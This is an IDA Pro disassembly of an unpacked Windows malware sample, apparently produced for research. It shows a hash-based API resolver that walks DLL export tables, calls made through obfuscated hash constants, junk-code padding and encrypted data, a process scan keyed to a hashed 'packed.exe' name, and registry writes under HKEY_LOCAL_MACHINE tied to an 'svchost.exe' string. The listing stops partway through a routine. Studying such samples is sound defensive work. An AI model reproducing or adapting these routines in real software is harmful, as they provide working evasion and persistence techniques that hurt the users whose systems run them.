;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9E826E24A72CE3884567118098D15F47
; File Name : u:\work\9e826e24a72ce3884567118098d15f47_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002422 ( 9250.)
; Section size in file : 00002422 ( 9250.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401226+4D�p
; sub_40147D+64�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov edi, [ebp+arg_0]
push 0
pop ebx
push 0
pop ecx
loc_401010: ; CODE XREF: sub_401000+25�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_401019
; ---------------------------------------------------------------------------
loc_401016: ; CODE XREF: sub_401000+1C�j
sub cl, 20h
loc_401019: ; CODE XREF: sub_401000+14�j
cmp cl, 20h
jnb short loc_401016
rol ebx, cl
inc edi
mov dl, [edi]
or dl, dl
jnz short loc_401010
xor ebx, 0
push ebx
pop [ebp+var_4]
popa
push [ebp+var_4]
pop eax
leave
retn 4
sub_401000 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401038 proc near ; CODE XREF: sub_401086+35�p
; sub_401357+9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
not ecx
cld
sub dl, bl
rol cl, 14h
shl esi, 0Eh
shr esi, 7
push [ebp+arg_0]
pop edi
mov ecx, [ebp+arg_4]
shr ecx, 2
mov eax, 0
shr ebx, 8
inc esi
mov ebx, esi
add ebx, 0AEh
mov edx, 1Ch
rep stosd
push [ebp+arg_4]
pop ecx
nop
rol ebx, 16h
nop
cmp bl, dl
nop
and ecx, 3
shl esi, 1
sub bl, dh
rep stosb
popa
leave
retn 8
sub_401038 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401086 proc near ; CODE XREF: sub_40118F+4D�p
; DATA XREF: sub_40118F+2C�o
var_401 = byte ptr -401h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFBFCh
mov ecx, offset dword_405004
mov eax, 1
lock xadd [ecx], eax
inc eax
cmp dword_40500C, 0
jnz short loc_4010AF
lea eax, [ebp+var_401]
jmp short loc_4010B5
; ---------------------------------------------------------------------------
loc_4010AF: ; CODE XREF: sub_401086+1F�j
lea eax, dword_405010
loc_4010B5: ; CODE XREF: sub_401086+27�j
push 401h
push eax
call sub_401038
push [ebp+arg_0]
pop eax
push dword ptr [eax]
pop edi
cmp dword_40500C, 0
jnz short loc_4010D8
lea esi, [ebp+var_401]
jmp short loc_4010DE
; ---------------------------------------------------------------------------
loc_4010D8: ; CODE XREF: sub_401086+48�j
lea esi, dword_405010
loc_4010DE: ; CODE XREF: sub_401086+50�j
cmp ebx, 49h
mov ah, [edi]
inc edi
neg ecx
ror bh, 12h
mov edx, ecx
sub ch, 90h
cmp bh, 13h
mov cl, [edi]
xor edx, edx
neg ebx
sub edx, ebx
inc edi
xor ebx, 0C0h
xor ebx, 64h
xor edx, ebx
loc_401105: ; CODE XREF: sub_401086+C5�j
mov al, [edi]
neg bl
xor al, ah
sub bl, bl
shr bh, 12h
shr dh, 10h
cmp bh, dl
xor bl, bl
mov [esi], al
shl bl, 0Bh
dec dh
neg dl
xor al, ah
dec dl
cmp dl, 0CFh
rol ah, 2
or ebx, 0C9h
or bl, dl
shl ebx, 1Fh
add ebx, 0F7h
inc edi
mov edx, 29h
mov bh, 0D7h
not bh
inc esi
dec ecx
sub dl, bh
or cl, cl
jnz short loc_401105
cmp dword_40500C, 0
jnz short loc_40117C
mov edi, [ebp+arg_0]
lea eax, [ebp+var_401]
push eax
pop dword ptr [edi]
loc_401162: ; CODE XREF: sub_401086+F4�j
push 19h
call sub_4033F2 ; Sleep
mov al, [ebp+var_401]
or al, al
jz short loc_40117C
cmp dword_405008, 0
jbe short loc_401162
loc_40117C: ; CODE XREF: sub_401086+CE�j
; sub_401086+EB�j
mov ecx, offset dword_405004
mov eax, 0FFFFFFFFh
lock xadd [ecx], eax
dec eax
leave
retn 4
sub_401086 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40118F proc near ; CODE XREF: sub_4011F2+B�p
; sub_402928+61�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov dword_405008, 0
push [ebp+arg_0]
pop eax
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
cmp dword_40500C, 0
jnz short loc_4011DB
push offset dword_405000
push 0
push eax
push offset sub_401086
push 0
push 0
call sub_4033E6 ; CreateThread
loc_4011C9: ; CODE XREF: sub_40118F+48�j
push 0
call sub_4033F2 ; Sleep
push [ebp+arg_0]
pop eax
cmp [ebp+var_4], eax
jz short loc_4011C9
jmp short loc_4011EA
; ---------------------------------------------------------------------------
loc_4011DB: ; CODE XREF: sub_40118F+22�j
push eax
call sub_401086
lea eax, dword_405010
mov [ebp+var_4], eax
loc_4011EA: ; CODE XREF: sub_40118F+4A�j
popa
mov eax, [ebp+var_4]
leave
retn 4
sub_40118F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011F2 proc near ; CODE XREF: sub_4013A4+24�p
; sub_4013A4+4C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov eax, [ebp+arg_0]
inc eax
push eax
call sub_40118F
mov [ebp+var_4], eax
push eax
call sub_4033EC ; LoadLibraryA
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+var_8]
call sub_401226
push eax
mov eax, [ebp+var_4]
push 0
pop dword ptr [eax]
pop eax
leave
retn 8
sub_4011F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401226 proc near ; CODE XREF: sub_4011F2+22�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
pusha
push [ebp+arg_0]
pop ebx
push 0
pop [ebp+var_14]
push dword ptr [ebx+3Ch]
pop eax
cmp word ptr [eax+ebx], 4550h
jnz short loc_4012BA
push dword ptr [eax+ebx+78h]
pop ecx
or ecx, ecx
jz short loc_4012BA
add ecx, ebx
push dword ptr [ecx+18h]
pop edx
mov eax, [ecx+1Ch]
mov esi, [ecx+20h]
mov edi, [ecx+24h]
add eax, ebx
mov [ebp+var_8], edx
add edi, ebx
push eax
pop [ebp+var_10]
push edi
pop [ebp+var_C]
add esi, ebx
mov [ebp+var_4], edx
loc_40126E: ; CODE XREF: sub_401226+5F�j
mov ecx, [esi]
add ecx, ebx
push ecx
call sub_401000
push eax
pop edx
cmp edx, [ebp+arg_4]
jz short loc_401289
add esi, 4
dec [ebp+var_4]
jnz short loc_40126E
jmp short loc_4012BA
; ---------------------------------------------------------------------------
loc_401289: ; CODE XREF: sub_401226+57�j
push [ebp+var_8]
pop eax
mov edx, [ebp+var_C]
sub eax, [ebp+var_4]
mov edx, [edx+eax*2]
mov eax, [ebp+var_10]
and edx, 0FFFFh
push dword ptr [eax+edx*4]
pop edx
add edx, ebx
push 0
pop eax
mov al, [edx]
xor eax, 0
cmp eax, 0CCh
jnz short loc_4012B6
xor edx, eax
loc_4012B6: ; CODE XREF: sub_401226+8C�j
push edx
pop [ebp+var_14]
loc_4012BA: ; CODE XREF: sub_401226+1A�j
; sub_401226+23�j ...
popa
push [ebp+var_14]
pop eax
leave
retn 8
sub_401226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012C3 proc near ; CODE XREF: sub_401357+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
mov eax, [ebp+arg_0]
mov ecx, 0
nop
push [ebp+arg_8]
pop ebx
loc_4012D7: ; CODE XREF: sub_4012C3+34�j
mov dh, [eax]
inc eax
nop
push eax
push 0
pop eax
pop eax
mov dl, [eax]
push edx
push 0
pop edx
pop edx
xor dh, dl
mov [ebx], dh
inc ebx
nop
push ebx
push 0
pop ebx
pop ebx
inc eax
inc ecx
cmp ecx, [ebp+arg_4]
jb short loc_4012D7
pop edx
pop ecx
pop ebx
pop eax
leave
retn 0Ch
sub_4012C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401301 proc near ; CODE XREF: sub_401330+1A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
mov ecx, [ebp+arg_0]
push 0
pop eax
mov edx, [ebp+arg_0]
push 0
pop eax
add edx, [ebp+arg_4]
mov eax, [ebp+arg_8]
loc_40131A: ; CODE XREF: sub_401301+25�j
mov ah, [ecx]
xor ah, al
mov [ecx], ah
push 0
pop eax
inc ecx
cmp edx, ecx
jnb short loc_40131A
pop edx
pop ecx
pop ebx
pop eax
leave
retn 0Ch
sub_401301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401330 proc near ; CODE XREF: sub_4016F9+9D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
mov edx, [ebp+arg_0]
mov eax, 0
mov al, [edx]
mov ecx, [ebp+arg_0]
inc ecx
push eax
push [ebp+arg_4]
push ecx
call sub_401301
pop edx
pop ecx
pop ebx
pop eax
leave
retn 8
sub_401330 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401357 proc near ; CODE XREF: sub_401380+14�p
; sub_401896+34�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_4]
call sub_401038
push [ebp+arg_0]
pop eax
inc eax
push 0
pop ecx
mov cx, [eax]
inc eax
inc eax
push [ebp+arg_4]
push ecx
push eax
call sub_4012C3
leave
retn 0Ch
sub_401357 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401380 proc near ; CODE XREF: sub_4016F9+24�p
; sub_4016F9+50�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
push 400h
push offset aSvchost_exe ; "svchost.exe "
push [ebp+arg_0]
call sub_401357
pop edx
pop ecx
pop ebx
pop eax
leave
retn 4
sub_401380 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013A4 proc near ; CODE XREF: sub_402281+FC�p
; sub_402281+15B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
jmp short loc_4013B4
; ---------------------------------------------------------------------------
byte_4013A9 db 0, 0DEh, 8 ; DATA XREF: sub_4013A4+1F�o
; sub_4013A4+47�o ...
dd 0D99F1EB5h, 85DE17BBh
; ---------------------------------------------------------------------------
loc_4013B4: ; CODE XREF: sub_4013A4+3�j
jmp short loc_4013BA
; ---------------------------------------------------------------------------
dword_4013B6 dd 0D0D4B2FEh ; sub_4013A4+41�r ...
; ---------------------------------------------------------------------------
loc_4013BA: ; CODE XREF: sub_4013A4:loc_4013B4�j
push [ebp+arg_4]
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_40582C, eax
mov dword_405830, eax
cmp eax, 0
jz loc_401466
push [ebp+arg_0]
push ds:dword_4013B6
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_405834, eax
inc dword_405834
cmp eax, 0
jz short loc_401466
loc_401407: ; CODE XREF: sub_4013A4+C0�j
jmp short loc_40140D
; ---------------------------------------------------------------------------
dword_401409 dd 0D4BC7432h ; sub_402281+173�r
; ---------------------------------------------------------------------------
loc_40140D: ; CODE XREF: sub_4013A4:loc_401407�j
push dword_405834
push [ebp+arg_4]
push offset dword_405838
push ds:dword_401409
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_401433
; ---------------------------------------------------------------------------
dword_40142F dd 0DF5C01CEh ; sub_401896+C3�r
; ---------------------------------------------------------------------------
loc_401433: ; CODE XREF: sub_4013A4+89�j
push offset dword_405838
push [ebp+arg_0]
push ds:dword_40142F
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0
jz short loc_40146D
cmp dword_405830, 0
jz short loc_401466
dec dword_405830
inc [ebp+arg_4]
jmp short loc_401407
; ---------------------------------------------------------------------------
loc_401466: ; CODE XREF: sub_4013A4+38�j
; sub_4013A4+61�j ...
mov eax, 0
jmp short locret_401479
; ---------------------------------------------------------------------------
loc_40146D: ; CODE XREF: sub_4013A4+AC�j
mov eax, dword_40582C
sub eax, dword_405830
inc eax
locret_401479: ; CODE XREF: sub_4013A4+C7�j
leave
retn 8
sub_4013A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40147D proc near ; CODE XREF: sub_4016F9+A�p
; sub_4025DD+37�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_401486
; ---------------------------------------------------------------------------
dword_401482 dd 0E66EAAD5h ; ---------------------------------------------------------------------------
loc_401486: ; CODE XREF: sub_40147D+3�j
push 0
push 2
push ds:dword_401482
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz locret_401554
mov dword_40593D, eax
mov dword_405941, 128h
jmp short loc_4014BA
; ---------------------------------------------------------------------------
dword_4014B6 dd 8B28F9EFh ; ---------------------------------------------------------------------------
loc_4014BA: ; CODE XREF: sub_40147D+37�j
push offset dword_405941
push dword_40593D
push ds:dword_4014B6
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 1
jnz short locret_401554
loc_4014DC: ; CODE XREF: sub_40147D+BA�j
push offset aPacked_exe ; "packed.exe"
call sub_401000
cmp eax, [ebp+arg_0]
jnz short loc_401512
jmp short loc_4014F1
; ---------------------------------------------------------------------------
dword_4014ED dd 0E3ECD03Ch ; sub_40147D+C2�r ...
; ---------------------------------------------------------------------------
loc_4014F1: ; CODE XREF: sub_40147D+6E�j
push dword_40593D
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
push dword_405949
pop eax
jmp short locret_401554
; ---------------------------------------------------------------------------
loc_401512: ; CODE XREF: sub_40147D+6C�j
jmp short loc_401518
; ---------------------------------------------------------------------------
dword_401514 dd 34F92A83h ; ---------------------------------------------------------------------------
loc_401518: ; CODE XREF: sub_40147D:loc_401512�j
push offset dword_405941
push dword_40593D
push ds:dword_401514
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_4014DC
push dword_40593D
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
push 0
pop eax
locret_401554: ; CODE XREF: sub_40147D+22�j
; sub_40147D+5D�j ...
leave
retn 4
sub_40147D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
push ecx
push eax
cld
push dword ptr [ebp+8]
pop esi
mov edi, [ebp+0Ch]
push dword ptr [ebp+10h]
pop ecx
rep movsb
pop eax
pop ecx
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
byte_401575 db 0, 49h, 0 ; DATA XREF: sub_4016F9+4B�o
; ---------------------------------------------------------------------------
lahf
int 3 ; Trap to Debugger
push 25h
add eax, [ebp+76h]
and cl, [ecx+1Eh]
js short loc_4015BD
jmp fword ptr [ebp+2B77B7F2h]
; ---------------------------------------------------------------------------
dw 7E3Bh
dd 5605526h, 5C007105h, 412EBCF2h, 0E526B0Fh, 72076221h
dd 8FFD80F2h, 0B9D7CAAFh, 5B0D3D49h, 0B8CAB3D6h, 0A7CE83F0h
dd 234D7B14h, 80CD5F03h
db 24h
; ---------------------------------------------------------------------------
loc_4015BD: ; CODE XREF: .text:00401582�j
dec ebx
or ebp, [edi-21h]
stosb
aad 0B9h
add ah, [edi-10h]
sbb dword ptr [edi], 43h
rep mov dl, 0EAh
cmpsd
sub [edi-61h], ah
sal dword ptr [ecx+2Dh], 1
pop ecx
or ah, [eax]
inc ebp
jnp short loc_4015E9
; ---------------------------------------------------------------------------
db 0DDh
; ---------------------------------------------------------------------------
loc_4015DB: ; CODE XREF: .text:004015F1�j
; .text:004015E3�j
test eax, 0ED83630Ah
adc [edi+2], dh
jno short near ptr loc_4015DB+3
movsd
; ---------------------------------------------------------------------------
dw 7E3Dh
; ---------------------------------------------------------------------------
stc
loc_4015E9: ; CODE XREF: .text:004015D8�j
xchg eax, esi
in al, dx
and byte ptr [ebx+5], 7Bh
adc dl, [edx]
jnz short loc_4015DB
fadd st, st(3)
repe cmpsd
xchg eax, edi
ja short near ptr loc_401624+1
adc edx, 1B6FB0D5h
test esi, ecx
sub edx, 0FFFFFF95h
sti
mov esi, 0A4D7D9h ; DATA XREF: sub_4016F9+1F�o
; sub_4016F9+89�o
add eax, [eax]
cli
lahf
aas
inc edi
shl dword ptr [edx+49497B49h], 49h ; DATA XREF: sub_4016F9+98�o
; sub_4016F9+AD�o
adc eax, 2C490D49h
dec ecx
aas
dec ecx
and [ecx+2Ah], cl
dec ecx
loc_401624: ; CODE XREF: .text:004015F8�j
sub al, 49h
adc eax, 28490149h
dec ecx
cmp ecx, [ecx+2Dh]
dec ecx
sub eax, 3A492049h
dec ecx
and cl, [ecx+1Fh]
dec ecx
db 26h
dec ecx
and eax, 24493C49h
dec ecx
sub al, 49h
js short loc_40168F
adc eax, 49494949h
dec ecx
dec ecx
dec ecx
dec eax
dec ecx
jnp short loc_40169B
dec ecx
dec ecx
adc eax, 2C490D49h
dec ecx
aas
dec ecx
and [ecx+2Ah], cl
dec ecx
sub al, 49h
adc eax, 28490149h
dec ecx
cmp ecx, [ecx+2Dh]
dec ecx
sub eax, 3A492049h
dec ecx
and cl, [ecx+1Fh]
dec ecx
db 26h
dec ecx
and eax, 24493C49h
dec ecx
sub al, 49h
jnp short near ptr loc_4016CA+1
adc eax, 49494949h
dec ecx
dec ecx
dec ecx
dec eax
dec ecx
jnp short near ptr dword_4016D4+3
dec ecx
loc_40168F: ; CODE XREF: .text:00401644�j
dec ecx
adc eax, 2C490D49h
dec ecx
aas
dec ecx
and [ecx+2Ah], cl
loc_40169B: ; CODE XREF: .text:00401650�j
dec ecx
sub al, 49h
adc eax, 28490149h
dec ecx
cmp ecx, [ecx+2Dh]
dec ecx
sub eax, 3A492049h
dec ecx
and cl, [ecx+1Fh]
dec ecx
db 26h
dec ecx
and eax, 24493C49h
dec ecx
sub al, 49h
jp short near ptr loc_401703+4
adc eax, 49494949h
dec ecx
dec ecx
dec ecx
dec eax
dec ecx
mov dh, 0B6h
loc_4016CA: ; CODE XREF: .text:00401680�j
mov dh, 0B6h
; ---------------------------------------------------------------------------
db 2 dup(0)
dword_4016CE dd 9798675Dh ; ---------------------------------------------------------------------------
jmp short loc_4016D8
; ---------------------------------------------------------------------------
dword_4016D4 dd 4C211301h ; DATA XREF: .text:004016DA�r ...
; ---------------------------------------------------------------------------
loc_4016D8: ; CODE XREF: .text:004016D2�j
push 28h
push ds:dword_4016D4
push offset byte_4013A9
call sub_4011F2
call eax
mov ecx, dword_405A75
mov dword_405A79, ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4016F9 proc near ; CODE XREF: start+D�p
push ds:dword_4016CE
pop eax
xor al, 15h
push eax
loc_401703: ; CODE XREF: .text:004016BC�j
call sub_40147D
cmp eax, 0
jbe locret_401859
push eax
pop dword_405A71
push (offset loc_401606+4)
call sub_401380
jmp short loc_401728
; ---------------------------------------------------------------------------
dword_401724 dd 6D3578E8h ; sub_402281+17�r ...
; ---------------------------------------------------------------------------
loc_401728: ; CODE XREF: sub_4016F9+29�j
push offset aSvchost_exe ; "svchost.exe "
push offset byte_405A7D
push ds:dword_401724
push offset byte_4013A9
call sub_4011F2
call eax
push offset byte_401575
call sub_401380
jmp short loc_40175B
; ---------------------------------------------------------------------------
dword_401750 dd 0AE08CF00h, 0BF928A5Bh ; sub_4016F9+C7�o ...
db 56h, 0CFh, 0C1h
; ---------------------------------------------------------------------------
loc_40175B: ; CODE XREF: sub_4016F9+55�j
jmp short loc_401761
; ---------------------------------------------------------------------------
dword_40175D dd 0E5FB4E67h ; ---------------------------------------------------------------------------
loc_401761: ; CODE XREF: sub_4016F9:loc_40175B�j
push offset dword_405A69
push offset aSvchost_exe ; "svchost.exe "
push 80000002h
push ds:dword_40175D
push offset dword_401750
call sub_4011F2
call eax
push (offset loc_401606+4)
call sub_401380
push 0BAh
push (offset loc_401611+2)
call sub_401330
jmp short loc_4017A1
; ---------------------------------------------------------------------------
dword_40179D dd 0A79C9D67h ; sub_4016F9+F9�r ...
; ---------------------------------------------------------------------------
loc_4017A1: ; CODE XREF: sub_4016F9+A2�j
push 0B8h
push (offset loc_401611+2)
push 3
push 0
push offset aSvchost_exe ; "svchost.exe "
push dword_405A69
push ds:dword_40179D
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz locret_401859
push 3
pop dword_405A6D
push 4
push offset dword_405A6D
push 4
push 0
push offset byte_405A7D
push dword_405A69
push ds:dword_40179D
push offset dword_401750
call sub_4011F2
call eax
push dword_405A69
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_401822
; ---------------------------------------------------------------------------
dword_40181E dd 49E971A4h ; sub_4025DD+144�r
; ---------------------------------------------------------------------------
loc_401822: ; CODE XREF: sub_4016F9+123�j
push dword_405A71
push 0
push 1
push ds:dword_40181E
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_401844
; ---------------------------------------------------------------------------
dword_401840 dd 0A408575Dh ; sub_4025DD+159�r
; ---------------------------------------------------------------------------
loc_401844: ; CODE XREF: sub_4016F9+145�j
push 1
push eax
push ds:dword_401840
push offset byte_4013A9
call sub_4011F2
call eax
locret_401859: ; CODE XREF: sub_4016F9+12�j
; sub_4016F9+D5�j
retn
sub_4016F9 endp
; ---------------------------------------------------------------------------
word_40185A dw 1200h ; DATA XREF: sub_401896+2F�o
; .text:004019AD�o
dd 0D4045700h, 0B932749Bh, 804B1CEDh, 44A9FBC1h, 20D5101h
dd 0FBBBD24Fh, 16F68498h, 3BD7A479h, 0B8E68054h
db 0CCh
byte_401881 db 0, 7, 0 ; DATA XREF: sub_401896+7B�o
; .text:004019EC�o
dd 0F09E145Dh, 50242251h, 6F034829h
db 44h, 28h
word_401892 dw 6464h ; DATA XREF: sub_401896+BE�o
; .text:004019F8�o
db 34h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401896 proc near ; CODE XREF: sub_401D9E+249�p
; sub_401D9E+34B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
jmp short loc_4018A2
; ---------------------------------------------------------------------------
dword_40189E dd 1F51A831h ; sub_401A2C+69�r ...
; ---------------------------------------------------------------------------
loc_4018A2: ; CODE XREF: sub_401896+6�j
push 11h
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_8], eax
push 400h
push offset byte_405A91
push offset word_40185A
call sub_401357
jmp short loc_4018D5
; ---------------------------------------------------------------------------
dword_4018D1 dd 0FF42048Bh ; .text:004019CC�r ...
; ---------------------------------------------------------------------------
loc_4018D5: ; CODE XREF: sub_401896+39�j
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push offset byte_405A91
push 80000002h
push ds:dword_4018D1
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short loc_401979
mov [ebp+var_C], 11h
push 400h
push offset byte_405A91
push offset byte_401881
call sub_401357
jmp short loc_401921
; ---------------------------------------------------------------------------
dword_40191D dd 0BFC4880Ah ; sub_402281+CE�r ...
; ---------------------------------------------------------------------------
loc_401921: ; CODE XREF: sub_401896+85�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_8]
push 0
push 0
push offset byte_405A91
push [ebp+var_4]
push ds:dword_40191D
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jz short loc_401951
mov eax, 0
jmp short loc_40197E
; ---------------------------------------------------------------------------
loc_401951: ; CODE XREF: sub_401896+B2�j
push [ebp+var_8]
push offset word_401892
push ds:dword_40142F
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jnz short loc_401974
push 1
pop eax
jmp short loc_401977
; ---------------------------------------------------------------------------
loc_401974: ; CODE XREF: sub_401896+D7�j
push 0
pop eax
loc_401977: ; CODE XREF: sub_401896+DC�j
jmp short loc_40197E
; ---------------------------------------------------------------------------
loc_401979: ; CODE XREF: sub_401896+68�j
mov eax, 0
loc_40197E: ; CODE XREF: sub_401896+B9�j
; sub_401896:loc_401977�j
push eax
jmp short loc_401985
; ---------------------------------------------------------------------------
dword_401981 dd 4AD2C820h ; ---------------------------------------------------------------------------
loc_401985: ; CODE XREF: sub_401896+E9�j
push [ebp+var_8]
push ds:dword_401981
push offset byte_4013A9
call sub_4011F2
call eax
pop eax
leave
retn
sub_401896 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 400h
push offset byte_405A91
push offset word_40185A
call sub_401357
lea eax, [ebp-4]
push eax
push 0F003Fh
push 0
push offset byte_405A91
push 80000002h
push ds:dword_4018D1
push offset dword_401750
call sub_4011F2
call eax
or eax, eax
jnz short locret_401A1B
push 400h
push offset byte_405A91
push offset byte_401881
call sub_401357
push 11h
push offset word_401892
push 1
push 0
push offset byte_405A91
push dword ptr [ebp-4]
push ds:dword_40179D
push offset dword_401750
call sub_4011F2
call eax
locret_401A1B: ; CODE XREF: .text:004019E0�j
leave
retn
; ---------------------------------------------------------------------------
align 2
dw 6
dd 663FAEFDh, 0DC88297Ah, 602DDE9Bh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A2C proc near ; CODE XREF: sub_401D9E+2FA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
jmp short loc_401A38
; ---------------------------------------------------------------------------
dword_401A34 dd 718EFC3Bh ; sub_401B6A+23�r ...
; ---------------------------------------------------------------------------
loc_401A38: ; CODE XREF: sub_401A2C+6�j
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
push ds:dword_401A34
push offset byte_4013A9
call sub_4011F2
call eax
cmp eax, 0FFFFFFFFh
jz loc_401B01
mov [ebp+var_4], eax
jmp short loc_401A71
; ---------------------------------------------------------------------------
dword_401A6D dd 0C3B18EB1h ; sub_401B6A+46�r
; ---------------------------------------------------------------------------
loc_401A71: ; CODE XREF: sub_401A2C+3F�j
push 0
push [ebp+var_4]
push ds:dword_401A6D
push offset byte_4013A9
call sub_4011F2
call eax
mov dword_405EE0, eax
push dword_405EE0
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
or eax, eax
jz short loc_401AFC
push eax
pop dword_405EDC
jmp short loc_401AB8
; ---------------------------------------------------------------------------
dword_401AB4 dd 5B70413Ch ; sub_401B6A+85�r ...
; ---------------------------------------------------------------------------
loc_401AB8: ; CODE XREF: sub_401A2C+86�j
push 0
push offset dword_405000
push dword_405EE0
push dword_405EDC
push [ebp+var_4]
push ds:dword_401AB4
push offset byte_4013A9
call sub_4011F2
call eax
push [ebp+var_4]
push ds:dword_4014ED
push offset byte_4013A9
call sub_4011F2
call eax
mov eax, 1
jmp short locret_401B04
; ---------------------------------------------------------------------------
loc_401AFC: ; CODE XREF: sub_401A2C+7D�j
push 0
pop eax
jmp short locret_401B04
; ---------------------------------------------------------------------------
loc_401B01: ; CODE XREF: sub_401A2C+36�j
push 0
pop eax
locret_401B04: ; CODE XREF: sub_401A2C+CE�j
; sub_401A2C+D3�j
leave
retn 4
sub_401A2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; CODE XREF: sub_401B6A+6�p
; sub_401D9E+11E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 105h
push 40h
push ds:dword_40189E
push offset byte_4013A9
call sub_4011F2
call eax
mov [ebp+var_4], eax
jmp short loc_401B30
; ---------------------------------------------------------------------------
dword_401B2C dd 2C79B0Ch ; ---------------------------------------------------------------------------
loc_401B30: ; CODE XREF: sub_401B08+22�j
push 0
push ds:dword_401B2C
push offset byte_4013A9
call sub_4011F2
call eax
jmp short loc_401B4A
; ---------------------------------------------------------------------------
dword_401B46 dd 0C09EDCDh ; ---------------------------------------------------------------------------
